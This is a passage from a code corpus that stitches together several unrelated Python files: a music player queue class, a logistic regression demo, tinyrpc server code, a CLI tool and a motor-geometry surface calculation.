"""Return repeat enabled setting."""
return self._repeat_mode
@repeat_mode.setter
def repeat_mode(self, enabled: bool) -> None:
"""Set repeat enabled setting."""
if self._repeat_mode != enabled:
self._repeat_mode = enabled
self._on_update("repeat_mode")
@property
def shuffle_enabled(self) -> bool:
"""Return shuffle enabled setting."""
return self._shuffle_enabled
@shuffle_enabled.setter
def shuffle_enabled(self, enabled: bool) -> None:
"""Set shuffle enabled setting."""
if not self._shuffle_enabled and enabled:
# shuffle requested
self._shuffle_enabled = True
if self._queue.current_index is not None:
played_items = self._queue.items[: self._queue.current_index]
next_items = self._queue.items[self._queue.current_index + 1 :]
# for now we use default python random function
# can be extended with some more magic based on last_played and stuff
next_items = random.sample(next_items, len(next_items))
items = played_items + [self._queue.current_item] + next_items
asyncio.create_task(self._queue.update(items))
self._on_update("shuffle_enabled")
elif self._shuffle_enabled and not enabled:
# unshuffle
self._shuffle_enabled = False
if self._queue.current_index is not None:
played_items = self._queue.items[: self._queue.current_index]
next_items = self._queue.items[self._queue.current_index + 1 :]
next_items.sort(key=lambda x: x.sort_index, reverse=False)
items = played_items + [self._queue.current_item] + next_items
asyncio.create_task(self._queue.update(items))
self._on_update("shuffle_enabled")
@property
def crossfade_mode(self) -> CrossFadeMode:
"""Return crossfade mode setting."""
return self._crossfade_mode
@crossfade_mode.setter
def crossfade_mode(self, mode: CrossFadeMode) -> None:
"""Set crossfade enabled setting."""
if self._crossfade_mode != mode:
# TODO: restart the queue stream if its playing
self._crossfade_mode = mode
self._on_update("crossfade_mode")
@property
def crossfade_duration(self) -> int:
"""Return crossfade_duration setting."""
return self._crossfade_duration
@crossfade_duration.setter
def crossfade_duration(self, duration: int) -> None:
"""Set crossfade_duration setting (1..10 seconds)."""
duration = max(1, duration)
duration = min(10, duration)
if self._crossfade_duration != duration:
self._crossfade_duration = duration
self._on_update("crossfade_duration")
@property
def volume_normalization_enabled(self) -> bool:
"""Return volume_normalization_enabled setting."""
return self._volume_normalization_enabled
@volume_normalization_enabled.setter
def volume_normalization_enabled(self, enabled: bool) -> None:
"""Set volume_normalization_enabled setting."""
if self._volume_normalization_enabled != enabled:
self._volume_normalization_enabled = enabled
self._on_update("volume_normalization_enabled")
@property
def volume_normalization_target(self) -> float:
"""Return volume_normalization_target setting."""
return self._volume_normalization_target
@volume_normalization_target.setter
def volume_normalization_target(self, target: float) -> None:
"""Set volume_normalization_target setting (-40..10 LUFS)."""
target = max(-40, target)
target = min(10, target)
if self._volume_normalization_target != target:
self._volume_normalization_target = target
self._on_update("volume_normalization_target")
@property
def stream_type(self) -> ContentType:
"""Return supported/preferred stream type for playerqueue. Read only."""
# determine default stream type from player capabilities
return next(
x
for x in (
ContentType.FLAC,
ContentType.WAVE,
ContentType.PCM_S16LE,
ContentType.MP3,
ContentType.MPEG,
)
if x in self._queue.player.supported_content_types
)
def to_dict(self) -> Dict[str, Any]:
"""Return dict from settings."""
return {
"repeat_mode": self.repeat_mode.value,
"shuffle_enabled": self.shuffle_enabled,
"crossfade_mode": self.crossfade_mode.value,
"crossfade_duration": self.crossfade_duration,
"volume_normalization_enabled": self.volume_normalization_enabled,
"volume_normalization_target": self.volume_normalization_target,
}
async def restore(self) -> None:
"""Restore state from db."""
async with self.mass.database.get_db() as _db:
for key, val_type in (
("repeat_mode", RepeatMode),
("crossfade_mode", CrossFadeMode),
("shuffle_enabled", bool),
("crossfade_duration", int),
("volume_normalization_enabled", bool),
("volume_normalization_target", float),
):
db_key = f"{self._queue.queue_id}_{key}"
if db_value := await self.mass.database.get_setting(db_key, db=_db):
value = val_type(db_value["value"])
setattr(self, f"_{key}", value)
def _on_update(self, changed_key: Optional[str] = None) -> None:
"""Handle state changed."""
self._queue.signal_update()
self.mass.create_task(self.save(changed_key))
# TODO: restart play if setting changed that impacts playing queue
async def save(self, changed_key: Optional[str] = None) -> None:
"""Save state in db."""
async with self.mass.database.get_db() as _db:
for key, value in self.to_dict().items():
if key == changed_key or changed_key is None:
db_key = f"{self._queue.queue_id}_{key}"
await self.mass.database.set_setting(db_key, value, db=_db)
class PlayerQueue:
"""Represents a PlayerQueue object."""
def __init__(self, mass: MusicAssistant, player_id: str):
"""Instantiate a PlayerQueue instance."""
self.mass = mass
self.logger = mass.players.logger
self.queue_id = player_id
self._settings = QueueSettings(self)
self._current_index: Optional[int] = None
# index_in_buffer: which track is currently (pre)loaded in the streamer
self._index_in_buffer: Optional[int] = None
self._current_item_elapsed_time: int = 0
self._last_item: Optional[QueueItem] = None
# start_index: from which index did the queuestream start playing
self._start_index: int = 0
self._next_start_index: int = 0
self._last_state = PlayerState.IDLE
self._items: List[QueueItem] = []
self._save_task: TimerHandle = None
self._update_task: Task = None
self._signal_next: bool = False
self._last_player_update: int = 0
self._stream_url: str = ""
async def setup(self) -> None:
"""Handle async setup of instance."""
await self._settings.restore()
await self._restore_items()
self._stream_url: str = self.mass.streams.get_stream_url(
self.queue_id, content_type=self._settings.stream_type
)
self.mass.signal_event(
MassEvent(EventType.QUEUE_ADDED, object_id=self.queue_id, data=self)
)
@property
def settings(self) -> QueueSettings:
"""Return settings/preferences for this PlayerQueue."""
return self._settings
@property
def player(self) -> Player | PlayerGroup:
"""Return the player attached to this queue."""
return self.mass.players.get_player(self.queue_id, include_unavailable=True)
@property
def available(self) -> bool:
"""Return if player(queue) is available."""
return self.player.available
@property
def active(self) -> bool:
"""Return bool if the queue is currenty active on the player."""
if self.player.use_multi_stream:
return self.queue_id in self.player.current_url
return self._stream_url == self.player.current_url
@property
def elapsed_time(self) -> float:
"""Return elapsed time of current playing media in seconds."""
if not self.active:
return self.player.elapsed_time
return self._current_item_elapsed_time
@property
def max_sample_rate(self) -> int:
"""Return the maximum samplerate supported by this queue(player)."""
return max(self.player.supported_sample_rates)
@property
def items(self) -> List[QueueItem]:
"""Return all items in this queue."""
return self._items
@property
def current_index(self) -> int | None:
"""Return current index."""
return self._current_index
@property
def current_item(self) -> QueueItem | None:
"""
Return the current item in the queue.
Returns None if queue is empty.
"""
if self._current_index is None:
return None
if self._current_index >= len(self._items):
return None
return self._items[self._current_index]
@property
def next_item(self) -> QueueItem | None:
"""
Return the next item in the queue.
Returns None if queue is empty or no more items.
"""
if next_index := self.get_next_index(self._current_index):
return self._items[next_index]
return None
def get_item(self, index: int) -> QueueItem | None:
"""Get queue item by index."""
if index is not None and len(self._items) > index:
return self._items[index]
return None
def item_by_id(self, queue_item_id: str) -> QueueItem | None:
"""Get item by queue_item_id from queue."""
if not queue_item_id:
return None
return next((x for x in self.items if x.item_id == queue_item_id), None)
def index_by_id(self, queue_item_id: str) -> Optional[int]:
"""Get index by queue_item_id."""
for index, item in enumerate(self.items):
if item.item_id == queue_item_id:
return index
return None
async def play_media(
self,
uris: str | List[str],
queue_opt: QueueOption = QueueOption.PLAY,
passive: bool = False,
) -> str:
"""
Play media item(s) on the given queue.
:param queue_id: queue id of the PlayerQueue to handle the command.
:param uri: uri(s) that should be played (single item or list of uri's).
:param queue_opt:
QueueOption.PLAY -> Insert new items in queue and start playing at inserted position
QueueOption.REPLACE -> Replace queue contents with these items
QueueOption.NEXT -> Play item(s) after current playing item
QueueOption.ADD -> Append new items at end of the queue
:param passive: do not actually start playback.
Returns: the stream URL for this queue.
"""
# a single item or list of items may be provided
if not isinstance(uris, list):
uris = [uris]
queue_items = []
for uri in uris:
# parse provided uri into a MA MediaItem or Basis QueueItem from URL
try:
media_item = await self.mass.music.get_item_by_uri(uri)
except MediaNotFoundError as err:
if uri.startswith("http"):
# a plain url was provided
queue_items.append(QueueItem(uri))
continue
raise MediaNotFoundError(f"Invalid uri: {uri}") from err
# collect tracks to play
if media_item.media_type == MediaType.ARTIST:
tracks = await self.mass.music.artists.toptracks(
media_item.item_id, provider=media_item.provider
)
elif media_item.media_type == MediaType.ALBUM:
tracks = await self.mass.music.albums.tracks(
media_item.item_id, provider=media_item.provider
)
elif media_item.media_type == MediaType.PLAYLIST:
tracks = await self.mass.music.playlists.tracks(
media_item.item_id, provider=media_item.provider
)
elif media_item.media_type == MediaType.RADIO:
# single radio
tracks = [
await self.mass.music.radio.get(
media_item.item_id, provider=media_item.provider
)
]
else:
# single track
tracks = [
await self.mass.music.tracks.get(
media_item.item_id, provider=media_item.provider
)
]
for track in tracks:
if not track.available:
continue
queue_items.append(QueueItem.from_media_item(track))
# load items into the queue
if queue_opt == QueueOption.REPLACE:
await self.load(queue_items, passive=passive)
elif (
queue_opt in [QueueOption.PLAY, QueueOption.NEXT] and len(queue_items) > 100
):
await self.load(queue_items, passive=passive)
elif queue_opt == QueueOption.NEXT:
await self.insert(queue_items, 1, passive=passive)
elif queue_opt == QueueOption.PLAY:
await self.insert(queue_items, 0, passive=passive)
elif queue_opt == QueueOption.ADD:
await self.append(queue_items)
return self._stream_url
async def stop(self) -> None:
"""Stop command on queue player."""
# redirect to underlying player
await self.player.stop()
async def play(self) -> None:
"""Play (unpause) command on queue player."""
if self.active and self.player.state == PlayerState.PAUSED:
await self.player.play()
else:
await self.resume()
async def pause(self) -> None:
"""Pause command on queue player."""
# redirect to underlying player
await self.player.pause()
async def play_pause(self) -> None:
"""Toggle play/pause on queue/player."""
if self.player.state == PlayerState.PLAYING:
await self.pause()
return
await self.play()
async def next(self) -> None:
"""Play the next track in the queue."""
next_index = self.get_next_index(self._current_index)
if next_index is None:
return None
await self.play_index(next_index)
async def previous(self) -> None:
"""Play the previous track in the queue."""
if self._current_index is None:
return
await self.play_index(max(self._current_index - 1, 0))
async def resume(self) -> None:
"""Resume previous queue."""
# TODO: Support skipping to last known position
if self._items:
prev_index = self._current_index
await self.play_index(prev_index)
else:
self.logger.warning(
"resume queue requested for %s but queue is empty", self.queue_id
)
async def play_index(self, index: Union[int, str], passive: bool = False) -> None:
"""Play item at index (or item_id) X in queue."""
# power on player when requesting play
if not self.player.powered:
await self.player.power(True)
if self.player.use_multi_stream:
await self.mass.streams.stop_multi_client_queue_stream(self.queue_id)
if not isinstance(index, int):
index = self.index_by_id(index)
if index is None:
raise FileNotFoundError(f"Unknown index/id: {index}")
if not len(self.items) > index:
return
self._current_index = index
self._next_start_index = index
# send stream url to player connected to this queue
self._stream_url = self.mass.streams.get_stream_url(
self.queue_id, content_type=self._settings.stream_type
)
if self.player.use_multi_stream:
# multi stream enabled, all child players should receive the same audio stream
# redirect command to all (powered) players
# TODO: this assumes that all client players support flac
content_type = ContentType.FLAC
coros = []
expected_clients = set()
for child_id in self.player.group_childs:
if child_player := self.mass.players.get_player(child_id):
if child_player.powered:
# TODO: this assumes that all client players support flac
player_url = self.mass.streams.get_stream_url(
self.queue_id, child_id, content_type
)
expected_clients.add(child_id)
coros.append(child_player.play_url(player_url))
await self.mass.streams.start_multi_client_queue_stream(
# TODO: this assumes that all client players support flac
self.queue_id,
expected_clients,
content_type,
)
await asyncio.gather(*coros)
elif not passive:
# regular (single player) request
await self.player.play_url(self._stream_url)
async def move_item(self, queue_item_id: str, pos_shift: int = 1) -> None:
"""
Move queue item x up/down the queue.
param pos_shift: move item x positions down if positive value
move item x positions up if negative value
move item to top of queue as next item if 0
"""
items = self._items.copy()
item_index = self.index_by_id(queue_item_id)
if pos_shift == 0 and self.player.state == PlayerState.PLAYING:
new_index = self._current_index + 1
elif pos_shift == 0:
new_index = self._current_index
else:
new_index = item_index + pos_shift
if (new_index < self._current_index) or (new_index > len(self.items)):
return
# move the item in the list
items.insert(new_index, items.pop(item_index))
await self.update(items)
async def delete_item(self, queue_item_id: str) -> None:
"""Delete item (by id or index) from the queue."""
item_index = self.index_by_id(queue_item_id)
if item_index <= self._index_in_buffer:
# ignore request if track already loaded in the buffer
# the frontend should guard so this is just in case
return
self._items.pop(item_index)
self.signal_update(True)
async def load(self, queue_items: List[QueueItem], passive: bool = False) -> None:
"""Load (overwrite) queue with new items."""
for index, item in enumerate(queue_items):
item.sort_index = index
if self.settings.shuffle_enabled and len(queue_items) > 5:
queue_items = random.sample(queue_items, len(queue_items))
self._items = queue_items
await self.play_index(0, passive=passive)
self.signal_update(True)
async def insert(
self, queue_items: List[QueueItem], offset: int = 0, passive: bool = False
) -> None:
"""
Insert new items at offset x from current position.
Keeps remaining items in queue.
if offset 0, will start playing newly added item(s)
:param queue_items: a list of QueueItem
:param offset: offset from current queue position
"""
if not self.items or self._current_index is None:
return await self.load(queue_items)
insert_at_index = self._current_index + offset
for index, item in enumerate(queue_items):
item.sort_index = insert_at_index + index
if self.settings.shuffle_enabled and len(queue_items) > 5:
queue_items = random.sample(queue_items, len(queue_items))
if offset == 0:
# replace current item with new
self._items = (
self._items[:insert_at_index]
+ queue_items
+ self._items[insert_at_index + 1 :]
)
else:
self._items = (
self._items[:insert_at_index]
+ queue_items
+ self._items[insert_at_index:]
)
if offset in (0, self._index_in_buffer):
await self.play_index(insert_at_index, passive=passive)
self.signal_update(True)
async def append(self, queue_items: List[QueueItem]) -> None:
"""Append new items at the end of the queue."""
for index, item in enumerate(queue_items):
item.sort_index = len(self.items) + index
if self.settings.shuffle_enabled:
played_items = self.items[: self._current_index]
next_items = self.items[self._current_index + 1 :] + queue_items
next_items = random.sample(next_items, len(next_items))
items = played_items + [self.current_item] + next_items
await self.update(items)
return
self._items = self._items + queue_items
self.signal_update(True)
async def update(self, queue_items: List[QueueItem]) -> None:
"""Update the existing queue items, mostly caused by reordering."""
self._items = queue_items
self.signal_update(True)
async def clear(self) -> None:
"""Clear all items in the queue."""
if self.player.state not in (PlayerState.IDLE, PlayerState.OFF):
await self.stop()
await self.update([])
def on_player_update(self) -> None:
"""Call when player updates."""
if self._last_state != self.player.state:
self._last_state = self.player.state
# always signal update if playback state changed
self.signal_update()
# handle case where stream stopped on purpose and we need to restart it
if self.player.state != PlayerState.PLAYING and self._signal_next:
self._signal_next = False
self.mass.create_task(self.resume())
# start poll/updater task if playback starts on player
async def updater() -> None:
"""Update player queue every second while playing."""
while True:
await asyncio.sleep(1)
self.update_state()
if self.player.state == PlayerState.PLAYING and self.active:
if not self._update_task or self._update_task.done():
self._update_task = self.mass.create_task(updater)
elif self._update_task:
self._update_task.cancel()
self._update_task = None
self.update_state()
def update_state(self) -> None:
"""Update queue details, called when player updates."""
if self.player.active_queue.queue_id != self.queue_id:
return
new_index = self._current_index
track_time = self._current_item_elapsed_time
new_item_loaded = False
# if self.player.state == PlayerState.PLAYING:
if self.player.state == PlayerState.PLAYING and self.player.elapsed_time > 0:
new_index, track_time = self.__get_queue_stream_index()
# process new index
if self._current_index != new_index:
# queue track updated
self._current_index = new_index
# check if a new track is loaded, wait for the streamdetails
if (
self.current_item
and self._last_item != self.current_item
and self.current_item.streamdetails
):
# new active item in queue
new_item_loaded = True
# invalidate previous streamdetails
if self._last_item:
self._last_item.streamdetails = None
self._last_item = self.current_item
# update vars and signal update on eventbus if needed
prev_item_time = int(self._current_item_elapsed_time)
self._current_item_elapsed_time = int(track_time)
if new_item_loaded:
self.signal_update()
if abs(prev_item_time - self._current_item_elapsed_time) >= 1:
self.mass.signal_event(
MassEvent(
EventType.QUEUE_TIME_UPDATED,
object_id=self.queue_id,
data=int(self.elapsed_time),
)
)
async def queue_stream_prepare(self) -> StreamDetails:
"""Call when queue_streamer is about to start playing."""
start_from_index = self._next_start_index
try:
next_item = self._items[start_from_index]
except (IndexError, TypeError) as err:
raise QueueEmpty() from err
try:
return await get_stream_details(self.mass, next_item, self.queue_id)
except MediaNotFoundError as err:
# something bad happened, try to recover by requesting the next track in the queue
await self.play_index(self._current_index + 2)
raise err
async def queue_stream_start(self) -> int:
"""Call when queue_streamer starts playing the queue stream."""
start_from_index = self._next_start_index
self._current_item_elapsed_time = 0
self._current_index = start_from_index
self._start_index = start_from_index
self._next_start_index = self.get_next_index(start_from_index)
self._index_in_buffer = start_from_index
return start_from_index
async def queue_stream_next(self, cur_index: int) -> int | None:
"""Call when queue_streamer loads next track in buffer."""
next_idx = self._next_start_index
self._index_in_buffer = next_idx
self._next_start_index = self.get_next_index(self._next_start_index)
return next_idx
def get_next_index(self, index: int) -> int | None:
"""Return the next index or None if no more items."""
if not self._items or index is None:
# queue is empty
return None
if self.settings.repeat_mode == RepeatMode.ONE:
return index
if len(self._items) > (index + 1):
return index + 1
if self.settings.repeat_mode == RepeatMode.ALL:
# repeat enabled, start queue at beginning
return 0
return None
async def queue_stream_signal_next(self):
"""Indicate that queue stream needs to start next index once playback finished."""
self._signal_next = True
def signal_update(self, items_changed: bool = False) -> None:
"""Signal state changed of this queue."""
if items_changed:
self.mass.create_task(self._save_items())
self.mass.signal_event(
MassEvent(
EventType.QUEUE_ITEMS_UPDATED, object_id=self.queue_id, data=self
)
)
else:
self.mass.signal_event(
MassEvent(EventType.QUEUE_UPDATED, object_id=self.queue_id, data=self)
)
def to_dict(self) -> Dict[str, Any]:
"""Export object to dict."""
cur_item = self.current_item.to_dict() if self.current_item else None
next_item = self.next_item.to_dict() if self.next_item else None
return {
"queue_id": self.queue_id,
"player": self.player.player_id,
"name": self.player.name,
"active": self.active,
"elapsed_time": int(self.elapsed_time),
"state": self.player.state.value,
"available": self.player.available,
"current_index": self.current_index,
"current_item": cur_item,
"next_item": next_item,
"settings": self.settings.to_dict(),
}
def __get_queue_stream_index(self) -> Tuple[int, int]:
"""Calculate current queue index and current track elapsed time."""
# player is playing a constant stream so we need to do this the hard way
queue_index = 0
elapsed_time_queue = self.player.elapsed_time
total_time = 0
track_time = 0
if self._items and len(self._items) > self._start_index:
# start_index: holds the last starting position
queue_index = self._start_index
queue_track = None
while len(self._items) > queue_index:
queue_track = self._items[queue_index]
if queue_track.duration is None:
# in case of a radio stream
queue_track.duration = 86400
if elapsed_time_queue > (queue_track.duration + total_time):
total_time += queue_track.duration
queue_index += 1
else:
track_time = elapsed_time_queue - total_time
break
return queue_index, track_time
async def _restore_items(self) -> None:
"""Try to load the saved state from cache."""
if queue_cache := await self.mass.cache.get(f"queue_items.{self.queue_id}"):
try:
self._items = [QueueItem.from_dict(x) for x in queue_cache["items"]]
self._current_index = queue_cache["current_index"]
except (KeyError, AttributeError, TypeError) as err:
self.logger.warning(
"Unable to restore queue state for queue %s",
self.queue_id,
exc_info=err,
)
await self.settings.restore()
async def _save_items(self) -> None:
"""Save current queue items/state in cache."""
await self.mass.cache.set(
f"queue_items.{self.queue_id}",
{
"items": [x.to_dict() for x in self._items],
"current_index": self._current_index,
},
)
| 2.046875 | 2 |
python/demos/logregDemoAffair.py | qyxiao/pmt | 0 | 12760344 | #logistic regression demo on female extra marital affair dataset
#https://github.com/justmarkham/gadsdc1/blob/master/logistic_assignment/kevin_logistic_sklearn.ipynb
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import statsmodels.api as sm
from patsy import dmatrices
from sklearn.linear_model import LogisticRegression
from sklearn.cross_validation import train_test_split
from sklearn import metrics
from sklearn.cross_validation import cross_val_score
# load dataset
data = sm.datasets.fair.load_pandas().data
# add "affair" column: 1 represents having affairs, 0 represents not
data['affair'] = (data.affairs > 0).astype(int)
# create dataframes with an intercept column and dummy variables for
# occupation and occupation_husb
# We use the patsy package to create the design matrix
# http://patsy.readthedocs.org/en/latest/overview.html
# This encodes categorical variables by dropping the first level
y, X = dmatrices('affair ~ rate_marriage + age + yrs_married + children + \
religious + educ + C(occupation) + C(occupation_husb)',
data, return_type="dataframe")
# fix column names of X
X = X.rename(columns = {'C(occupation)[T.2.0]':'occ_2',
'C(occupation)[T.3.0]':'occ_3',
'C(occupation)[T.4.0]':'occ_4',
'C(occupation)[T.5.0]':'occ_5',
'C(occupation)[T.6.0]':'occ_6',
'C(occupation_husb)[T.2.0]':'occ_husb_2',
'C(occupation_husb)[T.3.0]':'occ_husb_3',
'C(occupation_husb)[T.4.0]':'occ_husb_4',
'C(occupation_husb)[T.5.0]':'occ_husb_5',
'C(occupation_husb)[T.6.0]':'occ_husb_6'})
# flatten y into a 1-D array
y = np.ravel(y)
# split data into train and test sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)
# instantiate a logistic regression model, and fit with X and y
model = LogisticRegression()
model = model.fit(X_train, y_train)
# examine the coefficients
coef = np.ravel(model.coef_)
coef_round = [round(c, 2) for c in coef]
pd.DataFrame(zip(X.columns, np.transpose(coef_round)))
# predictions on test set
predicted = model.predict(X_test)
probs = model.predict_proba(X_test)
# check the accuracy
print 'baseline accuracy = {0}'.format(1-y.mean())
print 'accuracy on test set = {0}'.format(metrics.accuracy_score(y_test, predicted))
print 'auc on test set = {0}'.format(metrics.roc_auc_score(y_test, probs[:, 1]))
print 'class confusion matrix'
print metrics.confusion_matrix(y_test, predicted)
| 3.140625 | 3 |
main.py | leofansq/Tools_make_planes | 8 | 12760345 | <gh_stars>1-10
import make_planes as mp
# Path of the dataset, for KITTI is "/home/xxxxx/KITTI/training/"
DATA_FILE_PATH = "./training/"
print ("Start", DATA_FILE_PATH)
# lidar4to3(input_file_path, output_file_path="./points/")
mp.lidar4to3(DATA_FILE_PATH)
# cal_planes(input_file_path="./points/", output_file_path="./planes/")
mp.cal_planes() | 2.1875 | 2 |
tworaven_apps/data_prep_utils/static_vals.py | TwoRavens/TwoRavens | 20 | 12760346 |
DATAMART_AUGMENT_PROCESS = 'DATAMART_AUGMENT_PROCESS'
# ----------------------------------------------
# Related to the "Add User Dataset" process
# ----------------------------------------------
ADD_USER_DATASET_PROCESS = 'ADD_USER_DATASET_PROCESS'
ADD_USER_DATASET_PROCESS_NO_WORKSPACE = 'ADD_USER_DATASET_PROCESS_NO_WORKSPACE'
NEW_DATASET_DOC_PATH = 'new_dataset_doc_path'
DATASET_NAME_FROM_UI = 'name' # from dataset.js
DATASET_NAME = 'dataset_name' # from dataset.js
SKIP_CREATE_NEW_CONFIG = 'SKIP_CREATE_NEW_CONFIG'
# ----------------------------------------------
# Extensions
# ----------------------------------------------
EXT_CSV = '.csv'
EXT_TAB = '.tab'
EXT_TSV = '.tsv'
EXT_XLS = '.xls'
EXT_XLSX = '.xlsx'
VALID_EXTENSIONS = (EXT_CSV,
EXT_TAB, EXT_TSV,
EXT_XLS, EXT_XLSX)
# ----------------------------------------------
# For creating a datasetDoc
# ----------------------------------------------
DATASET_SCHEMA_VERSION = '4.0.0' # create a datasetDoc
PROBLEM_SCHEMA_VERSION = '4.0.0'
# Map Pandas types to the types used in the datasetDoc
# mapping from: https://pbpython.com/pandas_dtypes.html
# -> https://gitlab.datadrivendiscovery.org/MIT-LL/d3m_data_supply/blob/shared/schemas/datasetSchema.json
DTYPES = {
'int64': 'integer',
'float64': 'real',
'bool': 'boolean',
'object': 'string',
'datetime64': 'dateTime',
'category': 'categorical'
}
| 1.3125 | 1 |
tinyrpc/server/__init__.py | joydenfew/python3-tinyrpc | 0 | 12760347 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# FIXME: needs unittests
# FIXME: needs checks for out-of-order, concurrency, etc as attributes
from tinyrpc.exc import RPCError
class RPCServer(object):
"""High level RPC server.
:param transport: The :py:class:`~tinyrpc.transports.RPCTransport` to use.
:param protocol: The :py:class:`~tinyrpc.RPCProtocol` to use.
:param dispatcher: The :py:class:`~tinyrpc.dispatch.RPCDispatcher` to use.
"""
trace = None
"""Trace incoming and outgoing messages.
When this attribute is set to a callable this callable will be called directly
after a message has been received and immediately after a reply is sent.
The callable should accept three positional parameters:
* *direction*: string, either '-->' for incoming or '<--' for outgoing data.
* *context*: the context returned by :py:meth:`~tinyrpc.transport.RPCTransport.receive_message`.
* *message*: the message string itself.
Example::
def my_trace(direction, context, message):
logger.debug('%s%s', direction, message)
server = RPCServer(transport, protocol, dispatcher)
server.trace = my_trace
server.serve_forever
will log all incoming and outgoing traffic of the RPC service.
"""
def __init__(self, transport, protocol, dispatcher):
self.transport = transport
self.protocol = protocol
self.dispatcher = dispatcher
self.trace = None
def serve_forever(self):
"""Handle requests forever.
Starts the server loop continuously calling :py:meth:`receive_one_message`
to process the next incoming request.
"""
while True:
self.receive_one_message()
def receive_one_message(self):
"""Handle a single request.
Polls the transport for a new message.
After a new message has arrived :py:meth:`_spawn` is called with a handler
function and arguments to handle the request.
The handler function will try to decode the message using the supplied
protocol, if that fails, an error response will be sent. After decoding
the message, the dispatcher will be asked to handle the resultung
request and the return value (either an error or a result) will be sent
back to the client using the transport.
"""
context, message = self.transport.receive_message()
if callable(self.trace):
self.trace('-->', context, message)
# assuming protocol is threadsafe and dispatcher is theadsafe, as
# long as its immutable
def handle_message(context, message):
try:
request = self.protocol.parse_request(message)
except RPCError as e:
response = e.error_respond()
else:
response = self.dispatcher.dispatch(
request,
getattr(self.protocol, '_caller', None)
)
# send reply
if response is not None:
result = response.serialize()
if callable(self.trace):
self.trace('<--', context, result)
self.transport.send_reply(context, result)
self._spawn(handle_message, context, message)
def _spawn(self, func, *args, **kwargs):
"""Spawn a handler function.
This function is overridden in subclasses to provide concurrency.
In the base implementation, it simply calls the supplied function
``func`` with ``*args`` and ``**kwargs``. This results in a
single-threaded, single-process, synchronous server.
:param func: A callable to call.
:param args: Arguments to ``func``.
:param kwargs: Keyword arguments to ``func``.
"""
func(*args, **kwargs)
| 2.6875 | 3 |
sigla/cli/commands.py | mintyPT/sigla | 7 | 12760348 | <gh_stars>1-10
from pathlib import Path
import typer
from sigla import __version__, config
from sigla.cli.actions import Action, NewDefinitionFile, NewFiltersFile
from sigla.main import process
from sigla.utils.errors import TemplateDoesNotExistError
from sigla.utils.helpers import ensure_dirs
class VersionCommand(Action):
def run(self):
self.log(f"Version: {__version__}")
class RunCommand(Action):
def __init__(self, references):
self.references = references
self.globs = [
Path(config.path.definitions).glob(f"{reference}.xml")
for reference in references
]
self.matches = [match for glob in self.globs for match in glob]
@staticmethod
def handle_definition_file_match(match):
if not match.exists():
raise typer.Exit(f"✋ The definition(s) do not exists {match}")
is_dir = match.is_dir()
if is_dir:
return
print(f":: Reading {match}")
str_xml = match.read_text()
process("xml", str_xml, factory=None)
def run(self):
if len(self.matches) == 0:
try:
print(f"✋ No definition(s) found for {self.references}")
except TemplateDoesNotExistError as e:
print(e)
raise typer.Exit(e)
for match in self.matches:
self.handle_definition_file_match(match)
class NewCommand(Action):
def __init__(self, name) -> None:
super().__init__()
self.name = name
def run(self):
cmd = NewDefinitionFile(config.path.definitions, self.name)
cmd.run()
class InitCommand(Action):
def run(self):
self.log("sigla init")
self.create_folder(
config.path.templates,
config.path.snapshots,
config.path.definitions,
config.path.scripts,
)
self.create_filters()
def create_filters(self):
self.log(f"- checking/creating file {config.path.filters}")
cmd = NewFiltersFile(
config.path.root_directory, config.path.filters_filename
)
cmd.run()
def create_folder(self, *args):
for path in args:
self.log(f"- creating folder {path}")
ensure_dirs(path)
| 1.992188 | 2 |
pyleecan/Methods/Slot/HoleMLSRPM/comp_surface_magnets.py | carbon-drive/pyleecan | 1 | 12760349 | # -*- coding: utf-8 -*-
from numpy import exp, arcsin, tan, cos, sqrt, sin
def comp_surface(self):
"""Compute the surface of the Hole
Parameters
----------
self : HoleMLSRPM
A HoleMLSRPM object
Returns
-------
S: float
Surface of the Magnet. [m**2]
"""
Rbo = self.get_Rbo()
# Z1
delta1 = arcsin((self.R1 + self.W2) / (self.R1 + self.R3))
alpha1 = self.W1 - delta1
Z1 = self.R3 * exp(-1j * alpha1)
x1 = Z1.real
y1 = Z1.imag
# Zc1
Zc1 = (self.R3 + self.R1) * exp(-1j * alpha1)
xc1 = (self.R3 + self.R1) * cos(alpha1)
yc1 = -(self.R3 + self.R1) * sin(alpha1)
# Z2
x2 = (-1 / tan(self.W1) * xc1 + yc1 - self.W2 / cos(self.W1)) / -(
tan(self.W1) + 1 / tan(self.W1)
)
y2 = -tan(self.W1) * x2 + self.W2 / cos(self.W1)
Z2 = x2 + 1j * y2
# Z3
a3 = 1 + tan(self.W1) ** 2
b3 = -2 * tan(self.W1) * self.W2 / cos(self.W1)
c3 = (self.W2 / cos(self.W1)) ** 2 - self.R2 ** 2
x3 = (-b3 + sqrt(b3 ** 2 - 4 * a3 * c3)) / (2 * a3)
y3 = -tan(self.W1) * x3 + self.W2 / cos(self.W1)
Z3 = x3 + 1j * y3
# Z5
x5 = Rbo - self.H1
y5 = -self.W0 / 2
Z5 = x5 + 1j * y5
# Zc2
xc2 = Rbo - self.H1 - self.R1
yc2 = -self.W0 / 2
Zc2 = xc2 + 1j * yc2
# Z4
a4 = (xc2 - x3) ** 2 - self.R1 ** 2
b4 = 2 * (xc2 - x3) * (y3 - yc2)
c4 = (y3 - yc2) ** 2 - self.R1 ** 2
alpha2 = (-b4 - sqrt(b4 ** 2 - 4 * a4 * c4)) / (2 * a4)
x4 = (xc2 / alpha2 + yc2 + alpha2 * x3 - y3) / (alpha2 + 1 / alpha2)
y4 = alpha2 * (x4 - x3) + y3
Z4 = x4 + 1j * y4
# symmetry
Z6 = Z5.conjugate()
x6 = Z6.real
y6 = Z6.imag
Z7 = Z4.conjugate()
x7 = Z7.real
y7 = Z7.imag
Z8 = Z3.conjugate()
x8 = Z8.real
y8 = Z8.imag
Z9 = Z2.conjugate()
x9 = Z9.real
y9 = Z9.imag
Z10 = Z1.conjugate()
x10 = Z10.real
y10 = Z10.imag
S_magnet_1 = (
x1 * y2
+ x2 * y3
+ x3 * y4
+ x4 * y5
+ x5 * y6
+ x6 * y7
+ x7 * y8
+ x8 * y9
+ x9 * y10
+ x10 * y1
)
S_magnet_2 = (
x1 * y10
+ x2 * y1
+ x3 * y2
+ x4 * y3
+ x5 * y4
+ x6 * y5
+ x7 * y6
+ x8 * y7
+ x9 * y8
+ x10 * y9
)
S_magnet = 0.5 * abs(S_magnet_1 - S_magnet_2)
return S_magnet
| 3.015625 | 3 |
dicom_to_cnn/model/petctviewer/Roi.py | wendyrvllr/Dicom-To-CNN | 15 | 12760350 | import numpy as np
